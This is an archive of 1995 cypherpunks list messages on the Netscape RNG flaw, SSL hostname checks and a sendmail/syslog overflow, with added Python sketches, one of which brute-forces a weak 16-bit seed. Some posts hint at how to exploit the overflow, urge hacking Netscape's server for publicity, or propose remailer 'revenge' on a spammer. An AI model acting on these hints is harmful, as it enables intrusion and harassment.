To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: HEY!!! WAS: The Next Hack
Message-ID: <v0153050aac89da46099c@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 9/23/95, Mike McNally wrote:
>David Mandl writes:
> > Looks like we've got a perfect candidate for the first Official
> > Cypherpunks Press Release, folks.
>
>Then sign me off.  If something that inane were to go out with the
>word "cypherpunk" affixed to it, I'd cringe.  It could only be worse
>if it ended with the catchphrase "hack the planet".

Sigh.  In case there was any misunderstanding, it was a JOKE.  I was making
a comment about "Censored Girl's" loony-bin post as well as recent
proposals that we should be issuing official press releases.  Surely my
subtle sense of humor isn't THAT subtle.  Here:

:-)

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 23 Sep 95 12:19:44 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Going after Netscape"
In-Reply-To: <ac88af4202021004670f@[205.199.118.202]>
Message-ID: <199509231914.MAA01326@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've
> seen Netscape bomb on certain sites, as with the Cypherpunks archive site,
> as several of us noted a few months ago...probably a different problem, but
> indicative that Netscape can be corrupted). But let's be careful not to
> convey any flavor of this being a vendetta.

	I agree. The goal is not to kill Netscape but to make the net
secure.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 23 Sep 95 12:24:16 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: The Next Hack
In-Reply-To: <4407p5$on4@tera.mcom.com>
Message-ID: <199509231919.MAA01818@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   What exactly is the point of this?  We have:

	Is Netscape going to cover the cost of getting the new keys
that the servers generate signed and certified by VeriSign? Is netscape
going to tell its customers that they need to regenerate their
keys and get new certificates?

	Like I've said, I'm very impressed with netscape's quick
response and almost everything they've done.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 23 Sep 95 12:28:53 PDT
To: carolann@censored.org (Censored Girls Anonymous)
Subject: Re: HEY!!! WAS: The Next Hack
In-Reply-To: <199509231217.FAA27504@usr1.primenet.com>
Message-ID: <199509231923.MAA02185@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> You HAD stated a patch would be available by Friday.
> Now we are at early next week.

	I'd rather wait a few days for a good patch than have a bad,
untested patch available earlier.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 23 Sep 95 14:08:32 PDT
To: stewarts@ix.netcom.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <199509232108.OAA17020@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM 9/22/95 -0700, David G. Koontz wrote:
> If NSA requires real stochastic results for military crypto, what would
> we as casual cryptographers feel comfortable with?  The Netscape episode
> shows the comfort level needs improving.
>
> How good is good enough?


128 bits of true entropy, in your RNG seed, and never leaked 
is good enough.  (You one way hash the RNG numbers generated, 
to avoid leaking any information about your internal RNG state.)

Your RNG number must of course be based on the full seed, not on
some 16 bit subset of the seed.

To be on the safe side, you might use 128 bytes of seed, or 4K 
bytes of seed, just because gross overkill is cheap, and it is kind 
of nice to have a seed larger than any random numbers you might 
really need.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com
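
The points made in the message above (state derived from the full seed, outputs passed through a one-way hash, and the cost of drawing on only a 16-bit subset of the seed) as an added Python sketch. It is not code from the post or from any product discussed on the list; the class and function names, the choice of SHA-256 and the sample seed are assumptions made for illustration.

```python
import hashlib
import secrets

SEED_BYTES = 16  # 128 bits, the figure given in the message above


class HashedOutputRNG:
    """Illustrative generator: callers only ever see hashes of the state."""

    def __init__(self, seed: bytes):
        if len(seed) < SEED_BYTES:
            raise ValueError("seed must carry at least 128 bits")
        # The internal state depends on every byte of the seed.
        self._state = hashlib.sha256(b"init" + seed).digest()

    def next_block(self) -> bytes:
        # The output is a one-way hash of the state, so a block that has
        # been handed out does not reveal the state that produced it.
        out = hashlib.sha256(b"out" + self._state).digest()
        # Step the state with a differently labelled hash so that the
        # next state cannot be computed from the block just emitted.
        self._state = hashlib.sha256(b"next" + self._state).digest()
        return out


def weak_seed(seed: bytes) -> bytes:
    """The mistake warned against: keep 16 bits of the seed, zero the rest."""
    return seed[:2] + bytes(len(seed) - 2)


def recover_weak_seed(observed_block: bytes, seed_len: int = SEED_BYTES):
    """Search the 2**16 seeds a 16-bit subset can produce.

    Returns the matching seed, or None when the generator was not seeded
    from that small space. The same search over a full 128-bit seed would
    need 2**128 trials.
    """
    for guess in range(1 << 16):
        candidate = guess.to_bytes(2, "big") + bytes(seed_len - 2)
        if HashedOutputRNG(candidate).next_block() == observed_block:
            return candidate
    return None


if __name__ == "__main__":
    full = secrets.token_bytes(SEED_BYTES)       # seed from the OS generator
    good_block = HashedOutputRNG(full).next_block()
    bad_block = HashedOutputRNG(weak_seed(full)).next_block()
    print("weak seed recovered:", recover_weak_seed(bad_block) is not None)
    print("full seed recovered:", recover_weak_seed(good_block) is not None)
```

The hashing of outputs protects the state, but it does nothing for a generator whose effective seed is small: the 16-bit variant falls to a search of at most 65,536 candidates.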





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Fri, 22 Sep 95 20:20:29 PDT
To: cypherpunks@toad.com
Subject: speak freely
Message-ID: <199509230320.AA01298@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain


"One Time! This must be some new meaning of `one time' that I'm
not acquainted with." - apologies to Douglas Adams.

------- Forwarded Message

 Date: Fri, 22 Sep 95 16:11:20 PDT
 From: ari@es.net (Ari Ollikainen)
 Message-Id: <9509222311.AA27810@viipuri.nersc.gov>
 To: RCWG@nic.hep.net, ESCC@viipuri.nersc.gov
 Subject: FWD: Free secure Internet voice communication
 Cc: rem-conf@es.net, videophone@es.net

	Found in my mailbox...

  From: John Walker <kelvin@fourmilab.ch>
  Subject: Free secure Internet voice communication

I've just released to the public domain Release 5 of Speak Freely for
Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics
workstations.  Assuming you have a fast enough connection to the
Internet (with reasonably consistent packet delivery time) and/or a
fast enough CPU to perform audio compression in real time, you can
talk to anybody on Earth connected to the Internet who's also running
the program.  The Windows and Unix versions have entirely different
user interfaces, but can intercommunicate.  Complete source code is
available.

For communications security, IDEA, DES (less initial and final
permutations), and one-time pad (re-used for each sound packet)
encryption are available.  The intensely paranoid can enable any
combination of these.  The documentation explains how to use PGP to
securely exchange session keys before a conversation; an automatic
session key generator is provided.  DES is included for commercial
users who don't have a license to use the IDEA patent.  One-time pad
encryption is for those with machines too slow to run IDEA or DES in
real time.

I didn't include a public key mechanism because I wanted to avoid all
the confusion.  If somebody wants to navigate the narrow strait
between the RSA patent Scylla and Charybdis of export controls, the
programming work to implement public keys is straightforward and the
source code is yours to hack.

For further information, see:

    http://www.fourmilab.ch/netfone/windows/speak_freely.html

which describes the Windows version in detail and contains pointers to
the Sun and SGI editions, as well as links to download source code and
a ready-to-run executable for Windows.  You can also obtain the
program by anonymous binary FTP:

Unix source code:
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz

Windows executable:
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip

Windows source code (for Visual C 1.5):
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip

The Sun and SGI versions of this program are quite stable, and should
work for just about anybody with an adequate network connection.
Porting the code to other Unix workstations with audio hardware should
be relatively straightforward.  The Windows version has just been
finished and until it's shaken down on a variety of machines,
networks, sound cards, etc. may not work for everybody.

The Windows version requires a sound card with Windows Multimedia
drivers (I've tested it on a variety of Sound Blasters of various
generations) and a TCP/IP stack that supports WINSOCK (I'm using
NetManage Chameleon NFS).  Since multimedia and network hardware and
drivers vary tremendously from machine to machine, I wouldn't be
surprised if some tweaking were needed for various configurations.
The CPU speed required interacts with the speed of your network
connection; if you have a high-bandwidth connection to the Internet,
or you're talking to another person on a high-speed LAN, there's no
need to compress sound and the CPU load is minimal; just about any
machine will do.  If you need to compress in order to squeeze 8000
samples per second into a dial-up connection, then you need a CPU fast
enough to run GSM compression in real time: basically we're talking a
very fast 486 or Pentium.  If you turn on IDEA and/or DES encryption,
that also consumes CPU time.

Based on my experience with other Windows programs, it will probably
take months to track down misbehaviour due to strange hardware and
software configurations.  Complete, detailed bug reports are welcome.
I may not be able to respond individually, but the Web page will track
updates as they're released.  I have tested the program only on
vanilla 16 bit Windows 3.1.

The Windows version contains preliminary code to support direct
dial-up modem connections, acting as a phone scrambler.  Serial port
support in most Windows machines is so poor (unless you have a 16550A
UART and appropriate drivers, which most people don't) that this
feature isn't usable at present.  I've left the code in just in case
somebody with suitable hardware wants to bash it into working form.

If you add features, port the program to 32 bits, fix bugs, etc., let
me know so I can make your contributions generally available.

--------------------  <http://www.fourmilab.ch/>  -------------------
John Walker                      | A sufficiently advanced
Internet: kelvin@fourmilab.ch    | technology is indistinguishable
                                 | from a rigged demo.


------- End of Forwarded Message






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Sat, 23 Sep 95 10:41:57 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <199509221407.KAA23176@gatekeeper.itribe.net>
Message-ID: <199509231738.NAA25269@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 22, 10:10, David J. Bianco sent the following to the NSA's mail
archives:
> Subject: SSL Man-in-the-middle
|| I've read through the SSL spec, and it provides authentication for both
|| the server and the client, but these features are rarely used, probably
|| because they are somewhat inconvenient for the user.  A good first step
|| would be to include the IP address of the server in the certificate
|| signed by VeriSign. In this way, browsers could perform automatic checks
|| that the IP address in the certificate is actually the one that's being
|| communicated with. This does raise other questions (such as protecting
|| from IP spoofing), but IMHO would be a good way of providing an automatic
||  "first check" without inconveniencing users.  The added inconvenience of
|| obtaining a new certificate when your server's IP address changes is
|| fairly minor, and could be viewed as necessary overhead for doing secure
|| transactions via the Net.
||
||

Of course, the above is complete and utter crap (as Simon Spero pointed out
to me in much, much more polite terms 8-).  Let me take a stab at v2.0:

I've read through the SSL spec, and it provides authentication for both the
server and the client, though these features are rarely used, probably
because they are somewhat inconvenient for the user.  A good practice would
be to always code your SSL app to check that the CN (Common Name) field of
the certificate is the same as the hostname listed in the URL (CN always
appears to be an IP address, at least for Netscape server certificates).


Still, even with the bogus last paragraph, I stand by the rest of my post.
 I obviously haven't seen Netscape source, so I don't really know what
checks it might have, but none of the other SSL apps I've seen have an
auto-check feature, though it doesn't seem to be much more trouble at all.


--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/
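
The CN check proposed in the message above, as an added Python sketch that is not part of the original post: it compares the hostname in the URL with the commonName entries of a certificate supplied in the dictionary layout returned by `ssl.SSLSocket.getpeercert()`. The function names and the sample certificates are constructed for illustration.

```python
from urllib.parse import urlsplit


def url_hostname(url: str) -> str:
    """Return the host part of a URL, normalised for comparison."""
    host = urlsplit(url).hostname  # drops userinfo and port, lowercases
    if not host:
        raise ValueError("URL has no host component: %r" % url)
    return host.rstrip(".")


def cert_common_names(cert: dict) -> list:
    """Collect every commonName in the certificate subject.

    `cert` uses the getpeercert() layout: 'subject' is a tuple of RDNs,
    and each RDN is a tuple of (attribute, value) pairs.
    """
    names = []
    for rdn in cert.get("subject", ()):
        for attribute, value in rdn:
            if attribute == "commonName":
                names.append(value.rstrip(".").lower())
    return names


def cn_matches_url(cert: dict, url: str) -> bool:
    """True only when a subject CN equals the host named in the URL.

    Exact match only, as the message describes; no wildcard handling.
    A certificate with no CN at all never matches.
    """
    return url_hostname(url) in cert_common_names(cert)


# Constructed sample certificates (not taken from any real server).
SHOP_CERT = {
    "subject": (
        (("countryName", "US"),),
        (("organizationName", "Example Shop"),),
        (("commonName", "www.example.com"),),
    ),
}
IP_CERT = {"subject": ((("commonName", "192.0.2.10"),),)}
OTHER_CERT = {"subject": ((("commonName", "other.example.net"),),)}
NO_CN_CERT = {"subject": ((("organizationName", "Example Shop"),),)}

if __name__ == "__main__":
    for label, cert in [("shop", SHOP_CERT), ("other", OTHER_CERT)]:
        ok = cn_matches_url(cert, "https://www.example.com/checkout")
        print(label, "certificate accepted" if ok else "certificate rejected")
```

Current TLS libraries perform this comparison for you, against subjectAltName entries rather than the CN; in Python, `ssl.create_default_context()` turns on `check_hostname`.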




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Sep 95 11:31:54 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: netscape bug
In-Reply-To: <199509230003.RAA06024@orac.engr.sgi.com>
Message-ID: <199509231831.OAA06104@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> In article <DFALB4.A5u@sgi.sgi.com>, "Perry E. Metzger" <perry@piermont.com> writes:
> 
> > I can tell you in general terms -- I don't write MIPS assembler
> > myself. However, I will point out to you that you use an ancient
> > Sendmail, and that it uses syslog(3) on user produced data, and that
> > syslog uses a static buffer. Trick sendmail into logging something
> > very big, and you can do what you like. The 8lgm people wrote a demo
> > for Sparc as a proof of concept.
> 
> Hmm, after having looked at the syslogd code, it looks like this
> particular bug has been fixed for at least several years.

I said syslog(3), not syslogd(8).

The bug is in the client, not the server. Yes, you suffer from it. Go
and check.

> However, there sure are a hell of a lot of fixed size buffers being
> allocated off the stack and some of them are being used in unsafe
> ways.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 23 Sep 95 05:40:19 PDT
To: cypherpunks@toad.com
Subject: 500m.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.
Message-ID: <199509231240.OAA08555@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NYT Magazine, Sept 24, 1995


How the Propeller Heads Stole the Electronic Future

The silver-haired media monopolists follow their 500-
channel dream. They haven't reckoned with the 500 million
channels of Netscape and the Internet.

By Steven Levy.


If you want an arbitrary date for the burial of the
500-channel dream, Aug. 9, 1995, will do just fine. On
that morning, the public had its first crack at buying
stock in the year-old Netscape Communications Corporation,
which makes software that helps people navigate the
Internet and set up "sites" that Net surfers can visit.
What happened next is already the stuff of high-tech
legend. The offering price of $28 per share shot up
within minutes to a vertiginous $75 until finally
settling at $58, a price that valued the
as-yet-profitless company at well over $2 billion. A
month later, it was trading at about $53.

The initial news reports focused on the instant
millionaires at Netscape, including a 24-year-old
computer programmer, Marc Andreessen, who emerged from
the stock offering with that all-important first $58
million. But the real significance of the event was not
that another bunch of propeller heads had joined the
ranks of the super-rich. Aug. 9 marked the moment when
Wall Street finally realized what had been becoming
increasingly apparent to computer users: a set of highly
technical but reliably standardized communications
protocols known as the Internet had established itself as
the real key to the electronic future. That future would
be made not by silver-haired telephone- and cable-company
executives in Denver, New York and Washington, building
an empire around a golden goose called pay-per-view
television, but by companies like Netscape and their
customers.

In short, the end of the 500-channel dream. This was a
myth constructed by the masters of the media, people like
John Malone of Tele-Communications Inc. (T.C.I.), Ray
Smith of Bell Atlantic and Sumner Redstone of Viacom.
They believed that the television set would extend its
domain from the center of the entertainment universe to
the worlds of commerce and information. Despite their
promises that the new era of digital media would be
marked by increased competition, they assumed that their
companies would keep their hands on the valves of a
limited information pipeline. But for consumers, the
dream offered only two differences, really, between what
the public has now and what will be available in the
future.

*The same programming but more of it*. Instead of getting
50 or 60 alternatives when you plopped down in front of
the tube, you'd get a lot more. Five hundred was the
number that stuck in people's minds.

*So-called interactive programming*. The interactivity
comes in making choices: pressing buttons to choose
programs and, above all, to buy things. The living-room
television would be a cash register of sorts, enabling
Dad, Mom, Junior, Sis and probably even the faithful dog
Astro to buy more programming -- and buy more everything,
from pizzas to Dustbusters.

The operators of those systems, like T.C.I. and Time
Warner, would act as gatekeepers, deciding which
entertainment channels, pay-per-view events, banks,
retailers, publications and data bases would reach
consumers. There were tremendous opportunities to make
money, not only from monthly fees and pay-per-view
charges but also from percentages of every transaction.
And then there was the wealth of information about
consumer buying habits generated by the aggregation of
buying choices made by pressing those buttons. This, too,
would be sold and bartered.

For the past few months the silver-haired guys have been
arranging expensive technology tests in places like
Orlando, Fla. They have been wooing Congress for
favorable regulations. They have been frantically merging
and making alliances. But meanwhile, a different vision
of the media future has begun to form -- totally under
their radar. It moved from the academic and scientific
communities, then to the business world, then to
politics. As it grew and grew, it suddenly became clear
that this new vision had the potential to pull the plug
on the 500-channel dream.

This is the Internet and its most interesting subset, the
World Wide Web. It is based on unlimited channels of
communication, community building, electronic commerce
and a full-blown version of interactivity that blurs the
line between provider and consumer. You don't need an
Arthur Andersen report or even a cyberpunk science
fiction novel to envision how this new model of the
future will work. Millions are already participating in
it. Its nascent form -- albeit with often sluggish
performance and frequent system crashes -- has spread
like digital wildfire.

In short, the information superhighway, font of a
thousand bad metaphors, is already here. But it's not
about sitting on a couch and pressing a button to order
"Dumb and Dumber." It's about Web surfing, open systems
and freedom.

Why did the stock market go bonkers for Netscape, a
year-old company that not only operated deep in the red
but also warned in its prospectus that it did not intend
to make any profits "in the foreseeable future?" Only one
reason: the Internet.

If the 500-channel dream on the TV screen is the old
future, the new one is the Internet on the computer
screen. Think of it as a combination book, radio,
magazine, mailbox, conversation parlor, bulletin board,
billboard and, one day, television set. Install what is
known as a browser program -- the most popular is
Netscape's Navigator -- and you're cruising the World
Wide Web. Your screen is a selection of signed baseballs
up for auction, a tour of the Louvre, a zine (a
self-published magazine) on the life of a teen-age girl
in Canada, a multimedia repository of General Electric's
public relations documents, the complete text of the
Congressional Record. Millions of possibilities await
you, and getting to them is easy. Anything can be wired
to anything else on this World Wide Web (thus the name)
by moving the cursor to a highlighted word or image with
an embedded link to another location.

Web travelers do not just travel by links, of course --
they can go directly to any Web site. The interesting
thing about the sites is their equality. Like phone
numbers, or addresses on letters, these addresses have no
favored positions; in terms of gaining access to homes,
ABC, Disney and Sears have no inherent advantage over
Joe's Video or the corner pizza parlor. (For help in
knowing what's available, people are already adopting the
first of a new breed of electronic guide services, like
the popular Yahoo Web site, a sort of Baedeker's of the
Net.)

At first, Web traveling seems like a fascinating but
perhaps frivolous diversion. But then you consider the
next step -- commerce. Secure credit-card transactions are
already possible, the ability to charge for time spent on
a link is currently being implemented and companies like
Visa, Mastercard and newer entities with names like
Cybercash and Digicash (and, yes, Microsoft) are
concocting Net-based technologies that work just like
cash. And then you begin to realize why some farsighted
people in the media industries are terrified of the World
Wide Web. Every home is potentially a video conferencing
center, every independent film maker is potentially a
widespread broadcaster, every business is potentially a
global marketer. A single twisted idea and a rudimentary
sense of layout can transform a voiceless outcast into a
cult publisher. Now that's interactivity.

The 500-cable-channel tests are just the beginning of a
long process. The Net, meanwhile, has millions of people
on it, now. It will take a decade or so to upgrade the
Net to carry high-quality video services, but most
everything else is feasible now and better suited to the
desktop than to the TV room. You can't easily read a
newsletter or a bank balance on a television set that's
20 feet away. So by the time the cable and telephone
companies get their systems in order, millions of
Americans will be riding the I-way from their dens and
offices, not their living rooms. Sure, eventually the
electronics of computers and televisions will be
indistinguishable, but by then the road to information
nirvana will have been laid -- and the ethos will be that
of the Internet.

In that ethos, the people who provide you the pipes to
move information have no say in what content moves
through those pipes. They collect no information on their
consumers' buying habits, and they certainly do not get
a piece of the transactions that occur over their wires.
The guys in the middle -- those with the 500-channel
dream -- will thus be cut out of the best part of the
action.

The masters of the media have taken notice, and lately
they've been hedging their bets. Still, they have yet to
grasp that the Internet can never be merely another
profit center in their dreams of empire. Their power is
based on monopoly, on controlling distribution. But the
Net is built to smash monopolies. Instead of a
gatekeeper, users get an open invitation to the
electronic world and can choose whatever they want. "If
there is a market for 500 channels," says James
Barksdale, Netscape's president, "imagine the market for
5 million, 50 million, 500 million!"

Now, this new vision doesn't portend poverty for the
media masters. There's still a place for movie studios,
television producers and music publishers -- the Disneys
of the world -- in this new, content-driven universe. The
phone companies will provide Internet access to the
masses. And the couch-potato style of television will
probably always be with us.

But it won't be business as usual for the media masters.
It's entirely possible that beginning novelists,
musicians and even film makers will choose to distribute
through the Web. And it's almost inevitable that one day
soon, a John Grisham, an R.E.M. or a Roseanne will grasp
the advantages of ditching the media company and selling
directly to the consumer.

A year ago, people were buzzing about the proposed (and
eventually aborted) marriage of Bell Atlantic and T.C.I.
Now people are talking about Disney and Cap Cities, CBS
and Westinghouse, and Ted Turner and some other
television network. But if the World Wide Web shatters
the current paradigm of distribution, the channel
capabilities of cable systems and even networks will be
severely devalued. Anyone will be able to set up a new
channel or storefront on the virtual highway, for free,
asking permission of no one and accepting income directly
over the wire.

This is why John Perry Barlow, co-founder of the
Electronic Frontier Foundation, calls the current wave of
media realliances "the rearrangement of deck chairs on
the Titanic."

The iceberg, of course, is the Internet.

----------

Steven Levy is a columnist for Newsweek. His last article
for the New York Times Magazine was "The Unabomber and
David Gelernter."












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Sat, 23 Sep 95 06:15:30 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0swUQ2-0002EDC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


Again, we're Spammed by a moron.
Time to fire up the old remailers!
[At least they do this on weekends, when we have
time for creative revenge!] Hehehehehe...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Sep 95 12:35:32 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Why I haven't begun to be nasty to Netscape (was Re: The Next Hack)
In-Reply-To: <4407p5$on4@tera.mcom.com>
Message-ID: <199509231935.PAA06187@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   What else do you hope to gain by breaking a server key?  I think
> the point has been made.  Is there anything else that you would
> reasonably expect that we would do in response to a server key
> being broken that we have not already done?

Well, I don't know what the point was -- I don't think it's a useful
effort -- but I would like to make the following comment.

One problem I've had is that this isn't some toy being built at NCSA
any more -- it's something that lots of real money depends on. If I
treated my security critical code for my Wall Street clients the way
you guys have treated a lot of your code, I'd expect to be blackballed
and never work at anything more lucrative than shoe-shining again in
my entire career. You've all been giving the very standard "We're
overworked -- we didn't know -- I didn't look at that" sort of
answers. That's all fine and well -- but when the money gets stolen or
the plane crashes it isn't good enough.

Code like this has to be treated with enormous seriousness. That means
code reviews. That means people follow systematic security procedures
-- and that's not just in the "security code" because that isn't where
the break will come. It means that there are coding standards. It
means people break their backs very very seriously checking everything
and rechecking it, and then torture testing it. You folks are still
operating as if you are a garage operation when it comes to this
stuff, even though you are selling commerce servers that people depend
on for their business to operate.

You guys have gotten off quite lightly -- you screw up in a way that
could have cost your clients real money and all that happened is some
bad press and pressure to fix things. However, don't expect to be
treated that well next time. Those of us who are adults in this
business expect that we won't get second chances if we fuck a client
good and hard, and you guys shouldn't feel as though you've got
another couple of strikes to go. As I said, if I fucked up that way
I'd expect to have my career permanently ruined. You got off *easy*.

In my part of the universe, which is very close to the part you guys
have started to tread in, people treat this stuff very seriously.

As it happens, I know of some places in the financial community where
people have started to act lazy. I'm expecting to see lots of people
lose their careers when something bad happens.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Sat, 23 Sep 95 12:49:22 PDT
To: cypherpunks@toad.com
Subject: macworld crypto articles
Message-ID: <199509231949.PAA23337@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


The current (11/95) issue of MACWORLD magazine has two good crypto articles
in it.

1 - Protect your E-Mail by Bruce Schneier
Good introduction for neophytes, the basic how and why. Get some reprints
and give them away with PGP to your nonCypherpunk computer friends.


2 - False Security by Gene Steinberg

They searched for an applications programmer *UN*skilled at cryptography to
try and crack the password protection of the 8 best selling Mac programs.
Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.

Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 23 Sep 95 15:54:15 PDT
To: cypherpunks@toad.com
Subject: Re: The Fortezza random number generator is not trustworthy
Message-ID: <199509232254.PAA11243@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A nice addition to any Netscape RNG hacks is the comment that,
while Netscape may have a bug in their RNG, it's detectable and fixable;
the NSA may have a BUG in theirs, and only they'll know for sure...

>> Yes Fortezza cards can be instructed to produce a random number through one
>> of its library calls (someday they'll have a real API).  One of the
>> diagnostic tools I had tested this function.  What algorithm do they use?
>> Haven't a clue.  Sources say that the RNG implementation may vary from vendor
>> to vendor (i.e., GTC, Spyrus, Mykotronix, etc.).

John Gilmore's comments on CAPSTONE, subliminal channels, and FOIA blackouts 
certainly add depth to this suspiciousness.  I'd initially not been too worried
about the Fortezza (besides the obvious Master Key problems) because the NSA
is letting the military use them for Defense Messaging Service.  However,
if the RNG might be different for different vendors, the non-military versions
may be using a weak RNG, which the NSA has a backdoor to.  Alternatively,
the RNGs may all be the same, but there may be an option that the military can
use to get full-strength random numbers while the public, not knowing this,
gets weakened ones (e.g. the first n bits of the RNG may be random, and the next
N-n bits may be a strong hash, while there are N-n real random bits in another
register if you ask for them nicely.)

On a technical note, I would have thought that Fortezza and/or CAPSTONE used
some sort of hardware RNG, i.e. noisy Zener diodes or whatever.  I've seen it
mentioned on this list that some other NSA secure phones, such as STU-III,
do that.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 23 Sep 95 13:05:49 PDT
To: cypherpunks@toad.com
Subject: Re: "Going after Netscape"
Message-ID: <199509232003.QAA11668@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509231914.MAA01326@infinity.c2.org>, sameer@c2.org (sameer)
wrote:

>> So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've
>> seen Netscape bomb on certain sites, as with the Cypherpunks archive site,
>> as several of us noted a few months ago...probably a different problem, but
>> indicative that Netscape can be corrupted). But let's be careful not to
>> convey any flavor of this being a vendetta.
>
>        I agree. The goal is not to kill Netscape but to make the net
>secure.

Absolutely. We aren't on a vendetta. We want to make the net secure for
privacy. If hacking a Netscape server will help that goal, surely
Netscape's own would be the most appropriate server to try, since it will
generate the largest exposure in the press and thereby the strongest
motivation for Netscape to fix the hole.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGRoHyoZzwIn1bdtAQHJCgF9FbuTP1VBbzGJANFX48hvje4V7pzhyEaQ
ItXGdXHCPbxjKbQ0bLApkt4yTtHJREMk
=wEyv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 23 Sep 95 13:07:26 PDT
To: cypherpunks@toad.com
Subject: Re: The Next Hack
Message-ID: <199509232005.QAA11679@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509231919.MAA01818@infinity.c2.org>, sameer@c2.org (sameer)
wrote:

>> 
>>   What exactly is the point of this?  We have:
>
>        Is Netscape going to cover the cost of getting the new keys
>that the servers generate signed and certified by Verisign? Is netscape
>going to tell its customers that they need to regenerate their
>keys and get new certificates?
>
>        Like I've said, I'm very impressed with netscape's quick
>response and almost everything they've done.

I would be even more impressed if Netscape made their code publicly
available for examination.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

